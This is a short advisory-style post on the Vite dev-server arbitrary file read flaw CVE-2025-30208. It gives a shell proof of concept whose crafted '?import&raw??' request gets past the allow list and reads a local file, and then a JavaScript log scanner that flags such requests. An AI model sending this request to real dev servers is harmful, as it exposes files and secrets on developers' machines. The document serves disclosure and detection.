Vite Arbitrary File Read Vulnerability CVE-2025-30208

Original security 网安守护 2025-03-26 23:43

    $ npm create vite@latest
    $ cd vite-project/
    $ npm install
    $ npm run dev
    $ echo "top secret content" > /tmp/secret.txt

    # expected behaviour
    $ curl "http://localhost:5173/@fs/tmp/secret.txt"
    403 Restricted
    The request url "/tmp/secret.txt" is outside of Vite serving allow list.

    # security bypassed
    $ curl "http://localhost:5173/@fs/tmp/secret.txt?import&raw??"
    export default "top secret content\n"
    //# sourceMappingURL=data:application/json;base64,eyJ2…
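
For defenders, the request shape in the transcript above is easy to spot in access logs. The following is an added example, not part of the original post or of Vite: it assumes common-log-format lines from a proxy in front of the dev server, and the sample lines, function names and the "more than one ?" heuristic are constructed for illustration.

```javascript
// Constructed sample log lines (common log format), not captured traffic.
const SAMPLE_LOG = [
  '127.0.0.1 - - [26/Mar/2025:23:40:01 +0000] "GET /src/main.js HTTP/1.1" 200 412',
  '127.0.0.1 - - [26/Mar/2025:23:40:05 +0000] "GET /@fs/tmp/secret.txt HTTP/1.1" 403 96',
  '127.0.0.1 - - [26/Mar/2025:23:40:09 +0000] "GET /@fs/tmp/secret.txt?import&raw?? HTTP/1.1" 200 187',
  '127.0.0.1 - - [26/Mar/2025:23:40:12 +0000] "GET /@fs/home/dev/app/logo.svg?import&raw HTTP/1.1" 200 903',
  '127.0.0.1 - - [26/Mar/2025:23:41:30 +0000] "GET /@fs/tmp/secret.txt?import&raw?? HTTP/1.1" 403 96',
];

// Pulls the request target and status code out of one log line.
const REQUEST_RE = /"(?:GET|HEAD) (\S+) HTTP\/[\d.]+" (\d{3})/;

// Heuristic (assumption): a normal request target contains at most one "?".
// The request on this page adds extra "?" after the import/raw flags.
function classifyTarget(target) {
  const q = target.indexOf('?');
  const path = q === -1 ? target : target.slice(0, q);
  const query = q === -1 ? '' : target.slice(q + 1);
  if (!path.startsWith('/@fs/')) return 'ignore';
  const flags = query.split(/[&?]/);
  const hasInlineFlag = flags.includes('raw') || flags.includes('import');
  const extraSeparators = query.includes('?');
  return hasInlineFlag && extraSeparators ? 'bypass-shaped' : 'fs-access';
}

// Returns one finding per bypass-shaped request, with a triage verdict.
function scanLog(lines) {
  const findings = [];
  for (const line of lines) {
    const m = REQUEST_RE.exec(line);
    if (!m || classifyTarget(m[1]) !== 'bypass-shaped') continue;
    const status = Number(m[2]);
    findings.push({
      target: m[1],
      status,
      // 2xx: content was served despite the allow list, so triage it first.
      verdict: status >= 200 && status < 300 ? 'served' : 'blocked',
    });
  }
  return findings;
}

console.log(scanLog(SAMPLE_LOG));
```

A `served` finding means the file contents left the machine and anything readable at that path should be treated as disclosed; a `blocked` finding still records that someone probed the dev server.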